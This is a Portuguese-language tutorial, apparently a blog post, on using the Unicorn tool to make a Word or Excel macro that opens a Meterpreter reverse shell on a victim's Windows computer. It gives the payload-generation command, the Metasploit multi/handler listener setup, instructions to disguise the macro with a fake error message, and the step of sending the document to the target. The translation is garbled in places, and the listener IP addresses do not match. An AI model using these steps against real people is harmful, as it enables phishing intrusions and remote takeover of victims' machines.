A ferramenta é liberado para os repositórios GitHub você vai aprender a criar um arquivo Word ou Excel com uma macro maliciosa para ser executado pelo alvo resultará uma sessão remota no computador.
Download Link: https://github.com/trustedsec/unicorn.git
1. Baixar a ferramenta para repositórios clone em Kali Linux com os seguintes comandos no terminal:
git clone https://github.com/trustedsec/unicorn.git
2. Uma vez clonado o repositório, um nome de pasta é criada automaticamente Unicorn; para ver o que está contido no arquivo em questão deve digitar o seguinte comando no console:
Nota: Sempre que o unicórnio comando cd permite-nos para entrar nas ls pasta unicórnio e nos permite listar o conteúdo do arquivo.
cd unicorn
ls
Com o comando ./unicorn.py ou python unicorn.py começará a ferramenta unicórnio para ver as configurações que são exibidas.
3. Inicie a ferramenta, um menu deve aparecer como mostrado na tela a seguir, em que explica a sintaxe dos comandos deve tipiar para configurar a explorar com sucesso. Neste caso, você irá criar um arquivo txt com o código para ser injetado no documento pela primeira vez executado no sistema voltamos uma sessão remota com o seguinte comando:
python unicorn.py windows / meterpreter / reverse_tcp macro 192.168.0.110 4444
4. Após o shellcode carga gerada dois arquivos são criados na pasta com o nome do unicórnio powershell_attack.txt e unicorn.rc , o powershell_attack contém o código para ser injetado no documento do Word ou Excel através de uma macro e o arquivo unicorn.rc gerar uma sessão de audição automaticamente.
5. Em seguida, o arquivo será aberto powershell_attack.txt para verificar e modificar o seu conteúdo depois injetá-lo em uma macro com o seguinte comando:
nano powershell_attack.txt

6. Dentro do erro mensage do documento que aparece a vítima na linha referente a msg ser alterado.
7. Agora, iremos para uma máquina Windows para injetar o código em um macro de um documento do Word e o código que vem em serão copiados powershell_attack.txt no arquivo de macro.
8. Uma vez que o documento for salvo será passado para configurar a sessão de escuta em meterpreter é por isso que temos de começar do banco de dados metasploit
service postgresql start
msfdb init
msfclonsole
10. sessão meterpreter com os seguintes comandos serão definidos:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.122 : Este é o endereço IP do nosso kali Linux.
set lport 4444 : está é a porta que configurou
exploit
11. Finalmente, o arquivo será enviado para a vítima para executá-lo e por isso pode permitir que o meterpreter inicie sessão para inserir comandos remotos.
resultado scanner documento: Aqui